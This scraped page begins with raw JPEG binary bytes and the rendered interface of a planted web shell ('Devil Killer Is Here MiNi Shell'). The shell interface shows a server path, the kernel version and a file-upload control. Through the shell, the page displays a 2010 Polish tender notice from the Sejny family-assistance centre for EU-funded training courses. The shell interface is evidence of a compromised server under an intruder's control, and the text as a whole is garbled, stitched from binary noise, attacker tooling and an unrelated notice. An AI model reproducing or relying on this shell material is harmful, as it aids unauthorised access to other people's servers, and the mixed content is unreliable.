JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100622/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100622/178706-N-2010.html

<p class="kh_header"><b>Sejny: Przeprowadzenie szkoleń dla osób zagrożonych wykluczeniem społecznym w ramach projektu systemowego Nowe jutro - program integracji zawodowej i społecznej dla młodzieży współfinansowanego z Europejskiego Funduszu Społecznego w ramach priorytetu VII Promocja integracji społecznej, Działania 7.1 Rozwój i upowszechnianie aktywnej integracji, Poddziałania 7.1.2 Rozwój i upowszechnianie aktywnej integracji przez powiatowe centra pomocy rodzinie, Programu Operacyjnego Kapitał Ludzki.</b><br>
<b>Numer ogłoszenia: 178706 - 2010; data zamieszczenia: 22.06.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowe Centrum Pomocy Rodzinie w Sejnach , ul. Piłsudskiego 34, 16-500 Sejny, woj. podlaskie, tel. 87 517 34 15, faks 87 517 34 15.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przeprowadzenie szkoleń dla osób zagrożonych wykluczeniem społecznym w ramach projektu systemowego Nowe jutro - program integracji zawodowej i społecznej dla młodzieży współfinansowanego z Europejskiego Funduszu Społecznego w ramach priorytetu VII Promocja integracji społecznej, Działania 7.1 Rozwój i upowszechnianie aktywnej integracji, Poddziałania 7.1.2 Rozwój i upowszechnianie aktywnej integracji przez powiatowe centra pomocy rodzinie, Programu Operacyjnego Kapitał Ludzki..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest zorganizowanie szkoleń dla osób zagrożonych wykluczeniem społecznym, korzystających z pomocy społecznej z terenu powiatu sejneńskiego realizowanych w ramach projektu systemowego Nowe jutro - program integracji zawodowej i społecznej dla młodzieży współfinansowanego z Europejskiego Funduszu Społecznego w ramach priorytetu VII Promocja integracji społecznej, Działania 7.1 Rozwój i upowszechnianie aktywnej integracji, Poddziałania 7.1.2 Rozwój i upowszechnianie aktywnej integracji przez powiatowe centra pomocy rodzinie, Programu Operacyjnego Kapitał Ludzki. 

Zamówienie jest podzielone na 12 części:
Część 1 - Kurs Prawo jazdy kategorii  A - 1 osoba
	  1a- 2h zajęć praktycznych - 1 osoba

Część 2 - Kurs Prawo jazdy kategorii B - 18 osób - Miejsce szkolenia teoretycznego Sejny,
Część 2a- Kurs Prawo jazdy kategorii B- 1 osoba -Miejsce szkolenia teoretycznego Ełk,
Część 2b- Kurs Prawo jazdy kategorii B- 1 osoba - Miejsce szkolenia teoretycznego Białystok,

	  2c- 5h zajęć praktycznych- 1 osoba
	  2d- 2 h zajęć praktycznych kat. T- 1 osoba

Część 3 - Kurs Prawo jazdy kategorii C- 5 osób

Część 4 - Kurs Prawo jazdy kategorii C+E - 1 osoba

1)	Dotyczy Części  1,2,3,4.
   Miejsce szkolenia praktycznego: 
	Teren powiatu sejneńskiego i suwalskiego-  pozostali  uczestnicy
	Teren powiatu białostockiego- 		1 osoba kat. B.
	Teren powiatu ełckiego i suwalskiego-	1 osoba kat. B.
Zamawiający wymaga, aby ilość godzin poszczególnych kursów była zgodna z Programem Szkolenia Kandydatów na Kierowców dla każdej z wyżej wymienionych kategorii- zał. Nr 3 do Rozporządzenia Ministra Infrastruktury w sprawie szkolenia, egzaminowania i uzyskiwania uprawnień przez kierujących pojazdami instruktorów i egzaminatorów z dnia 27.10.2005r (Dz. U. Nr 217 poz.. 1834).
Kurs może być rozłożony w czasie:  przy czym, co najmniej  10  osób z kat. B  i wszyscy z pozostałych kategorii powinni  zakończyć kurs do 30.09.2010r. a pozostali kursanci z kat. B najpóźniej do 30.11.2010r. Wykonawca przy ustalaniu terminu kursów weźnie  pod uwagę możliwości czasowe uczestników kursu. 
Wykonawca zapewni niezbędne materiały szkoleniowe, również w formie elektronicznej.
Szkolenie musi zakończyć się egzaminem państwowym. Wykonawca zobowiązany jest do zgłoszenia uczestników kursu na egzamin państwowy i opłacenia egzaminu państwowego w zakresie każdego rodzaju prawa jazdy w uprawnionym ośrodku egzaminacyjnym oraz zapewnienia dojazdu na egzamin wszystkim uczestnikom szkolenia.
Wyposażenie sali dydaktycznej: dostęp do stanowiska komputerowego max. 2 uczestników do jednego stanowiska.
Zamawiający oświadcza, że wszyscy uczestnicy kursu są pełnoletni. 
Szkolenie rozpoczyna się badaniem lekarskim, których koszt pokrywa Zamawiający.
Wykonawca umożliwi eksponowanie LOGO realizowanego projektu w miejscu i w czasie prowadzenia zajęć teoretycznych.
Instytucja szkoląca będzie zobowiązana wszelką dokumentację opatrzyć odpowiednimi logotypami, które są dostępne na stronie internetowej www.efs.gov.pl oraz zawrzeć informację o współfinansowaniu szkolenia z EFS. Przestrzegać zasad promocji Projektu zgodnie z 
wytycznymi zawartymi na stronie www. efs.gov.pl ( Promocja w ramach Programu Operacyjnego Kapitał Ludzki 2007-2013).
Wykonawca zobowiązany jest do bieżącego prowadzenia w trakcie szkolenia listy obecności uczestników z każdego dnia szkolenia oraz przedstawienia kopii tej listy Zamawiającemu w terminie 7 dni od zakończenia szkolenia.
Wykonawca zobowiązany będzie do prowadzenia dokumentacji przebiegu szkolenia stanowiącej:
a) dziennik zajęć edukacyjnych zawierający listę obecności, wymiar godzin i tematy zajęć edukacyjnych,
b) protokół z egzaminu wewnętrznego,
c) rejestr wydanych zaświadczeń lub innych dokumentów potwierdzających ukończenie szkolenia oraz przekazania kserokopii ww. dokumentacji, potwierdzonej za zgodność z oryginałem w terminie 7 dni od daty zakończenia szkolenia.
- Wykonawca zobowiązany jest do przechowywania dokumentów szkolenia do dnia 31.12.2020 r. zgodnie z umową zawartą pomiędzy Samorządem Województwa Podlaskiego a Powiatowym Centrum Pomocy Rodzinie w Sejnach.

Część 5 - Kurs język angielski angielskiego dla młodzieży.

a) Liczba godzin lekcyjnych:
- 51 h dla początkujących,
- 51 h dla średniozaawansowanych,
b) liczba osób zgłoszonych do szkolenia - 9 osób 
c) Termin realizacji: lipiec 2010r.
d) miejsce szkolenia:  Sejny (zapewnia Zamawiający)
e) wiedza wykładowcy: 
-wykształcenie nie niższe niż wyższe magisterskie w zakresie filologii angielskiej, 
-uprawnienia/ kurs pedagogiczny, 
- udokumentowane doświadczenie  w zawodzie nauczyciela- lektora-wykładowcy języka angielskiego nie mniej niż 5 lat.
f) tematyka kursu:
Kurs powinien zacząć się testem na podstawie wyniku, którego uczestnicy zostaną podzieleni na 2 grupy. Jedną grupę będą stanowiły osoby z nikłym i słabym stopniem zaawansowania języka a drugą osoby które już posiadają ugruntowana wiedzę.
Kurs powinien być zorientowany na praktyczne wykorzystanie poznawanego języka w konkretnych sytuacjach życiowych. Beneficjenci powinni być zmotywowani do prowadzenia rozmów zainspirowanych aktualnymi wydarzeniami. Zajęcia powinny umożliwić nabycie biegłości i śmiałości mówienia w języku obcym. Wykładowca powinien zachęcić do opowiadania o swoich pasjach, celach i potrzebach. 
Beneficjenci powinni w równym stopniu poznać i udoskonalić wszystkie sprawności językowe: mówienie i rozumienie ze słuchu, gramatykę, czytanie oraz pisanie Podczas zajęć systematycznie powinna być pogłębiana wiedza naszych słuchaczy, która wzbogaci ich słownictwo oraz utrwali struktury gramatyczne.
Na zajęciach, oprócz pracy z podręcznikiem, powinny być wykorzystywane materiały audio-video oraz materiały oryginalne, takie jak wycinki prasowe, wiadomości z Internetu, programy telewizyjne czy filmy w wersji oryginalnej.
Tematyka kursu oprócz przełamywania bariery językowej  powinna umożliwić poszerzanie horyzontów beneficjentów, rozbudzić  ciekawość w poznawaniu świata oraz zachęcić do nauki języka angielskiego, ukazać celowość jego poznawania.
W celu wyłonienia najlepszej oferty wykonawca powinien przedstawić program kursu uwzględniając tematykę kursu zawartą w pkt. f dla dwóch poziomów zaawansowania  oraz wymiar godzin wyszczególniony w pkt. a.
g) inne: wykonawca powinien w ofercie przedstawić kwalifikacje prowadzącego kurs.

Część 6 - Kurs pt. Profesjonalny sprzedawca + kasy fiskalne.

a) liczba godzin: 40 h dydaktycznych (1 godzina dydaktyczna= 45 min.)
b) liczba osób zgłoszonych do szkolenia - 5 osób 
c) przybliżony termin realizacji:  wrzesień-październik 2010r. Konkretny termin zostanie ustalony z wykonawcą, zostanie on dostosowany do możliwości czasowych uczestników projektu.
d) miejsce szkolenia:  preferowane -Sejny, dopuszczamy możliwość organizacji kursu  w innej miejscowości jednak nie dalej położonej niż 45 km od Sejn.
e) wiedza prowadzących: wykształcenie wyższe magisterskie, doświadczenie w przeprowadzeniu szkoleń o tematyce podanej w kursie Profesjonalny sprzedawca + kasy fiskalne lub innym o tematyce sprzedażowej, praktyka zawodowa.
f) tematyka kursu:
-przygotowanie do sprzedaży i nawiązanie kontaktu,
-prezentacja oferty językiem korzyści dla klienta,
-zachowania podczas trudnych rozmów i sytuacji,
-negocjacje zakupowe,
-budowanie trwałych relacji, czyli kontakty sprzedażowe,
-obsługa kas fiskalnych,
-wykonywanie i rodzaje raportów dostępnych w urządzeniach fiskalnych.
g) inne: wykonawca powinien w ofercie przedstawić kwalifikacje prowadzącego kurs.

Część 7 - Kurs pt. Kierowca wózków jezdniowych z wymianą butli gazowej.

a) liczba godzin: 44 h dydaktyczne
b) liczba osób zgłoszonych do szkolenia- 5 osób
c) przybliżony termin realizacji:  czerwiec- październik 2010r. Konkretny termin zostanie ustalony z wykonawcą, zostanie on dostosowany do możliwości czasowych uczestników projektu.
d) miejsce szkolenia:  preferowane -Sejny, dopuszczamy możliwość organizacji kursu  w innej miejscowości jednak nie dalej położonej niż 45 km od Sejn.
e) cel kursu: 
- Nabycie i pogłębienie wiedzy oraz podniesienie poziomu umiejętności w zakresie:
- znajomości podziału wózków jezdniowych na rodzaje, typy, odmiany, postacie i wielkości.
- znajomości budowy wózka, jego zespoły i podzespoły mechaniczne, elektryczne.
- urządzeń zabezpieczających, sygnalizujących, ostrzegawczych 
- znajomości czynności operatora w czasie pracy z wózkami.
 - umiejętności kierowania wózkiem
- umiejętności załadowania i rozładowania towaru.
- umiejętności manewrowania wózkiem.
f) program kursu:
- Szkolenie teoretyczne.
	typy stosowanych wózków jezdniowych
	budowa wózka.
	 czynności operatora przy obsłudze wózków przed podjęciem pracy  i po pracy z wózkami.
	 czynności operatora w czasie pracy wózkami. 
	wiadomości z zakresu ładunkoznawstwa. 
	wiadomości z zakresu BHP. 
	 akty prawne i warunki techniczne dozoru technicznego 
- Szkolenie praktyczne.
	instruktaż stanowiskowy.
	praktyczna nauki jazdy. 
- Wymiana butli gazowej.
g) forma zakończenie kursu- egzamin wewnętrzny na świadectwo kwalifikacyjne -E- w zakresie wymiany butli gazowych i egzamin przed Komisja Urzędu Dozoru Technicznego w Białymstoku  na zaświadczenie w zakresie obsługi wózków jezdniowych z mechanicznym napędem podnoszenia.
h) inne: wykonawca powinien w ofercie przedstawić kwalifikacje prowadzącego kurs.

Część 8 - Kurs pt. Profesjonalna kosmetyczka. 

a) liczba godzin: 100
b) liczba osób zgłoszonych do szkolenia- 10 osoby
c) termin realizacji: do uzgodnienia (w okresie lipiec- październik.). Konkretny termin zostanie ustalony z wykonawcą oraz będzie dostosowany do możliwości czasowych uczestników projektu.
d) miejsce szkolenia:  preferowane- Sejny, dopuszczamy możliwość organizacji kursu  w innej miejscowości jednak nie dalej położonej niż 45 km od Sejn.
e) tematyka kursu:

Zajęcia Teoretyczne- 23 h

	 Organizacja pracy przy wykonywaniu zabiegów kosmetycznych
- zapoznanie z wyposażeniem oraz organizacją pracy w gabinecie kosmetycznym,
- charakterystyka funkcji i metod zarządzania w gabinecie kosmetycznym. 
- zapoznanie z obsługą i zastosowaniem lamp i aparatów wykorzystywanych w gabinecie kosmetycznym,
	Rodzaje skór - cer,  
- rozpoznanie rodzaju cery,
	Depilacja, 
- rodzaje nadmiernego owłosienia i określanie jego przyczyn powstawania,
	Zabiegi  pielęgnacyjne dla  poszczególnych rodzajów skór,
	Kosmetyki myjące, tonizujące, peelingujące, pielęgnujące ,
	Kremy,
	Zagadnienia teoretyczne dotyczące budowy dłoni, palca, paznokcia i stopy,
	Przeciwwskazania do wykonywania manicure i pedicure,
- rozpoznawanie przeciwwskazań do pedicure i pielęgnacji stóp,
- rozpoznanie przeciwwskazań do manicure i zabiegów pielęgnacyjnych dłoni,
	Pielęgnacja paznokci,
	Środki  wspomagające i pielęgnujące masażu  kosmetycznego,
	Rodzaje wizyt w gabinetach kosmetycznych,
	Kosmetyki do ciała,
	Powtórzenie materiału,
	Egzamin końcowy teoretyczny.

Zajęcia Praktyczne- 77 h

	Henna , regulacja łuku brwiowego, 
­	określanie i ustalanie kształtu łuku brwiowego dla danego kształtu twarzy, 
­	przygotowanie stanowiska pracy i klientki do wykonywania zabiegu farbowania rzęs i brwi z regulacją łuku brwiowego,
	Depilacja, 
­	wykonywanie depilacji ciepłym woskiem kończyn dolnych i górnych, 
­	wykonywanie depilacji ciepłym woskiem dołów pachowych, strefy bikini i wąsików,
	Oczyszczanie twarzy,
­	wykonywanie zabiegu oczyszczania mechanicznego skóry twarzy w gabinecie kosmetycznym, 
­	wykonywanie klasycznych zabiegów pielęgnacyjnych przeznaczonych do podstawowych rodzajów cery,
	Organizacja pracy przy wykonywaniu manicure - pedicure,
­	organizowanie stanowiska pracy do wykonywania zabiegu manicure i zapoznanie się z narzędziami do wykonywania zabiegu,
­	organizowanie stanowiska pracy do pedicure,
	Zabiegi  relaksacyjne, kąpiele dłoni, kompresy, preparaty używane do pielęgnacji dłoni paznokci i  stóp,
­	wykonywanie masażu dłoni, 
­	wykonywanie zabiegu pielęgnacyjnego dłoni, 
­	wykonywanie masażu stóp,
	Manicure,
­	wykonywanie zabiegu manicure,
	Zdobnictwo paznokci 
­	malowanie płytki paznokciowej z zastosowaniem dowolnych technik zdobnictwa,
	Pedicure 
­	wykonywanie zabiegu pedicure przy użyciu odpowiednich preparatów i narzędzi,
­	wykonywanie zabiegu pielęgnacyjnego stóp i malowania płytki paznokciowej,
­	Maski kosmetyczne,
Techniki masażu  kosmetycznego,
	Masaż twarzy 
­	wykonywanie masażu twarzy,
	Masaż dekoltu,
	Masaż relaksujący,
	Pielęgnacja ciała - biustu, nóg, pośladków, brzucha, 
­	przeprowadzenie diagnozy stanu skóry, biustu, ramion, łokci i kolan, 
­	pielęgnowanie ramion, łokci i kolan w gabinecie kosmetycznym, 
­	wykonywanie masażu ręcznego piersi,
­	wykonywanie zabiegu pielęgnacyjnego na biust dostosowanego do potrzeb skóry, 
­	pielęgnacja piersi w domu,
	Zabiegi kosmetyczne na ciało 
­	określanie i identyfikowanie defektów kosmetycznych, przyczyn ich powstawania oraz sposobów ich redukcji i likwidowania, - istota działania terapeutycznego stymulacji elektrycznej mięśni i tkanek, 
­	organizacja w praktyce zabiegów elektrostymulacji elektrycznej mięśni i tkanek, 
­	wykonywanie zabiegu body wrapping glinkami leczniczymi i aromatami, 
­	wykonywanie zabiegu wyszczuplającego metodą GUAM,
	Powtórzenie materiału.
	Egzamin końcowy praktyczny.

f) kwalifikacje wykładowcy: uprawnienia i certyfikaty pozwalające na przeprowadzenie tego rodzaju kursu oraz potwierdzenie zorganizowania wcześniej co najmniej 1 kursu kosmetyczki.
g) efekt: przekazanie wiedzy uczestnikom projektu, która umożliwi zdanie egzaminu wewnętrznego. Po zdaniu egzaminu wewnętrznego beneficjenci otrzymają certyfikat-świadectwo-zaświadczenie potwierdzające kwalifikacje do przeprowadzania zabiegów kosmetycznych i prawo wykonywania zawodu kosmetyczki.   

Część 9 - Kurs pt. Tworzenie portali biznesowych. 

a) liczba godzin: minimum 60,  w tym 30 godzin pracy z trenerem i 30 godzin samodzielnej pracy monitorowanej.
b) termin realizacji: lipiec 2010r.
c) liczba osób: 1.
d) miejsce szkolenia: nie dotyczy.
e) sposób prowadzenia kursu: online - w formie wideokonferencji,
f) tematyka kursu:
- systemy zarządzania treścią stron WWW- CMS,
- idealny CMS- przykład trafionych i chybionych pomysłów,
- projektowanie portalu- strategiczny etap decydujący o porażce lub powodzeniu pomysłu,
- metodyka wytwarzania oprogramowania internetowego,
- procesy pracy (Workflows)
- portal korporacyjny zarabiający na reklamach sieci WWW,
- handel elektroniczny, a może współpraca z programami Partnerskimi?,
-wyszukiwarki stron WWW,
- budowa wyszukiwarki WWW, a pozycjonowanie naszego portalu,
- WWW- stan obecny i przyszłość.
g) kwalifikacje wykładowcy: uprawnienia i certyfikaty pozwalające na przeprowadzenie tego rodzaju kursu oraz potwierdzenie zorganizowania wcześniej co najmniej 1 kursu Tworzenie Portali Biznesowych.

Część 10 - szkolenie dla  osób zatrudnionych przy napełnianiu zbiorników pojazdów samochodowych zasilanych gazem skroplonym (LPG). 

a) liczba godzin: 20h 
b) liczba osób zgłoszonych do szkolenia- -1 osoba 
c) przybliżony termin realizacji:  lipiec- listopad 2010r. Konkretny termin zostanie ustalony z wykonawcą, zostanie on dostosowany do możliwości czasowych uczestników projektu.
d) miejsce szkolenia:  preferowane -Sejny, dopuszczamy możliwość organizacji kursu  w innej miejscowości jednak nie dalej położonej niż 45 km od Sejn.
e) cel kursu: 
- opanowanie znajomość instrukcji obsługi stanowiska napełniania zbiorników pojazdów samochodowych z silnikiem zasilanym gazem skroplonym,
- opanowanie znajomość instrukcji obsługi zbiorników LPG zainstalowanych w pojazdach samochodowych z silnikiem zasilanym gazem skroplonym,
- zapoznanie się z przepisami bezpieczeństwa i higieny pracy na stanowisku pracy,
- zapoznanie się z  przepisami szczegółowego postępowania w razie zagrożenia powstałego w związku z napełnieniem zbiorników LPG zainstalowanych w pojazdach samochodowych z silnikiem zasilanym gazem skroplonym.
f) inne: wykonawca powinien w ofercie przedstawić kwalifikacje prowadzącego kurs.

UWAGA !!!
Powyższe zagadnienia mogą być w planie nauczania rozwinięte, lecz pominięcie któregoś z powyższych skutkować będzie odrzuceniem oferty.

Postanowienia ogólne: 

1)	Zamawiający zastrzega, że może zmniejszyć lub zwiększyć liczbę osób realizujących kurs: 
Część 1 - Kurs Prawo jazdy kategorii  A - odwołać kurs lub dodać 1 osoba  osobę,
Część 2 - Kurs Prawo jazdy kategorii B - zmniejszyć o 3 osoby lub zwiększyć o 2 osoby,
Część 2a- Kurs Prawo jazdy kategorii B- odwołać kurs lub dodać 1 osoba  osobę,
Część 2b- Kurs Prawo jazdy kategorii B- odwołać kurs lub dodać 1 osoba  osobę,
Część 3 - Kurs Prawo jazdy kategorii C- zmniejszyć 1 osobę lub zwiększyć o 1 osobę,
Część 4 - Kurs Prawo jazdy kategorii C+E - odwołać kurs lub dodać 1 osoba  osobę,
Część 5 - Kurs język angielski angielskiego dla młodzieży- zmniejszyć o 2 osobę zwiększyć o 3 osoby,
Część 6 - Kurs pt. Profesjonalny sprzedawca + kasy fiskalne- zmniejszyć 1 osobę lub zwiększyć o 1 osobę,
Część 7 - Kurs pt. Kierowca wózków jezdniowych z wymianą butli gazowej- zmniejszyć o 1 osobę lub zwiększyć o 1 osobę,
Część 8 - Kurs pt. Profesjonalna kosmetyczka- zmniejszyć o 2 osobę lub zwiększyć o 2 osoby,
Część 9 - Kurs pt. Tworzenie portali biznesowych- odwołać kurs lub dodać 1 osoba  osobę,
Część 10 - szkolenie dla  osób zatrudnionych przy napełnianiu zbiorników pojazdów samochodowych zasilanych gazem skroplonym (LPG)- odwołać kurs lub dodać 1 osoba  osobę.

2) Każdy z wykonawców powinien przedstawić dokładny program szkolenia, który powinien zawierać w szczególności:
a)	szczegółowego konspektu do zajęć uwzględniającego:
- treść programu,
- proponowaną liczbę godzin na poszczególne bloki tematyczne,
- ilość godzin praktycznych i teoretycznych ogółem,
- ilość godzin praktycznych i teoretycznych, przypadających na jednego uczestnika warsztatów,
- informację o stosowanych metodach i technikach nauczania,
- informację o materiałach dydaktycznych, udostępnianych uczestnikom zajęć wraz z formą ich udostępnienia,
b)	informacji dotyczącej: 
- miejsca odbywania zajęć teoretycznych-opis sal do zajęć  teoretycznych-jeżeli dotyczy, 
- miejsca odbywania zajęć praktycznych -ilość stanowisk i ich dokładny opis oraz ich wyposażenie,
- wykazu zaproponowanego sprzętu, przyrządów, urządzeń niezbędnych celem realizacji zamówienia,
- wykazu materiałów dydaktycznych, które otrzyma każdy uczestnik szkolenia wraz z formą udostępnienia,
c)	wykazu umiejętności i wiedzy, jaką nabędą uczestnicy warsztatów,
d)	imiennego wykazu osób w tym kadry dydaktycznej, która będzie uczestniczyć w wykonaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia, niezbędnych do wykonania zamówienia, a także zakres wykonywanych przez nich czynności,
e)	szczegółowego preliminarza zajęć z uwzględnieniem kosztów poniesionych na organizację i realizację przedmiotowego warsztatów,
f)	proponowanego systemu, czasu i terminu realizacji zajęć (rozkład zajęć),
g)	wzoru świadectwa (certyfikatu lub zaświadczenia) ukończenia warsztatów,
h)	projektu ankiety dla uczestników warsztatów,
i)	 sposób sprawdzania efektów szkolenia (egzamin).
3)  Dokumentacja:  

Wykonawca zobowiązany jest do bieżącego prowadzenia w trakcie kursu listy obecności uczestników z każdego dnia szkolenia oraz przedstawienia kopii tej listy Zamawiającemu w terminie 7 dni od zakończenia kursu.
Wykonawca zobowiązany będzie do prowadzenia dokumentacji przebiegu kursu stanowiącej:
i) dziennik zajęć edukacyjnych zawierający listę obecności, wymiar godzin i tematy zajęć edukacyjnych,
ii) protokół z egzaminu wewnętrznego,
iii) rejestr wydanych zaświadczeń lub innych dokumentów potwierdzających ukończenie szkolenia oraz przekazania kserokopii ww. dokumentacji, potwierdzonej za zgodność z oryginałem w terminie 7 dni od daty zakończenia szkolenia.

4) Oznakowanie: 

Wykonawca umożliwi eksponowanie LOGO realizowanego projektu w miejscu i w czasie prowadzenia zajęć teoretycznych. Instytucja szkoląca będzie zobowiązana wszelką dokumentację opatrzyć odpowiednimi logotypami, które są dostępne na stronie internetowej www.efs.gov.pl oraz zawrzeć informację o współfinansowaniu szkolenia z EFS. Przestrzegać zasad promocji Projektu zgodnie z wytycznymi zawartymi na stronie www. efs.gov.pl ( Promocja w ramach Programu Operacyjnego Kapitał Ludzki 2007-2013).
5) Program nauczania powinien odpowiadać wymogom określony w § 5 Rozporządzenia Ministra Edukacji i Nauki z dnia 03 lutego 2006 roku w sprawie uzyskiwania i uzupełniania przez osoby dorosłe wiedzy ogólnej, umiejętności i kwalifikacji zawodowych w formach pozaszkolnych (Dz.U. Nr 31 z 2006r. Poz.216).
6)Każdy uczestnik musi otrzymać na własność najpóźniej przed rozpoczęciem danego wykładu (prezentacji, spotkania) materiały merytoryczne, zawierające najważniejsze informacje omawiane na wykładzie.
Zamówienie należy wykonać w terminie do dnia 30 listopada 2010r. Szczegółowe terminy każdego szkolenia zostaną ustalone w umowie..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zwiększenie liczby osób w poszczególnych częściach zamówienia.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.34.00.00-9, 80.53.00.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 12.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
